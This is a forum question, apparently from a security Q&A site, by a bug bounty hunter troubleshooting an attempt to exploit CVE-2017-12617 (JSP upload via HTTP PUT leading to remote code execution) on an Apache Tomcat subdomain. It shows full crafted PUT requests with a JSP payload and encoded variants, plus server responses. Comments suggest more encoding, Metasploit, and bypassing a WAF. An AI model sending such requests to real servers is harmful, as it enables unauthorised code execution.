0

I am a bug bounty hunter. When doing some research, I found a subdomain that is using Apache Tomcat. Talk about Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with enabled PUT request method will allow the attacker to create a JSP file in the server through a crafted request and will lead to RCE:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://vulnerable.com/public/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>

And after some testing, I found that the server enabled the PUT method. But when I sent the exploit request, there is an error:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>




HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 389
Date: Fri, 17 Apr 2020 02:07:24 GMT
Connection: close

<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div></body></html>

I found that the error is from the Java URLDecoder. The server may has decoded the content in the body of the request, but the % o is not a valid URL character, so the error turns out. It proves that the server has handled the request, it may works but not. Then I try this:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<%25 out.println("hello");%25>




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

It gave me back a 404 response. I have tried the POST but it just proves that there is a special thing in the PUT method:

POST /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

(The POST request even does not appear any error or response). I have checked the 1.jsp file but it hasn't been created yet:

GET /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

Does anyone know what is happens and what should I do next?

user232075
  • 1
  • Did you try encoding more of the payload? Did that give any results? – Raimonds Liepiņš Apr 17 '20 at 05:36
  • @RaimondsLiepiņš Which type of encoding? URL, base64, ...? – user232075 Apr 17 '20 at 11:41
  • Have you tried the Metasploit module or Python script for this CVE? – multithr3at3d Apr 17 '20 at 15:15
  • I haven't downloaded Metasploit yet and I have tried Python script but it does not work. You think there is the difference between Automation script and manual exploit? Absolutely not, the automation script just sends the original request which has been public with the vulnerability and only manual exploit can bypass WAF or somethings like that. Totally I don't trust the exploit script. – user232075 Apr 19 '20 at 14:23

0 Answers0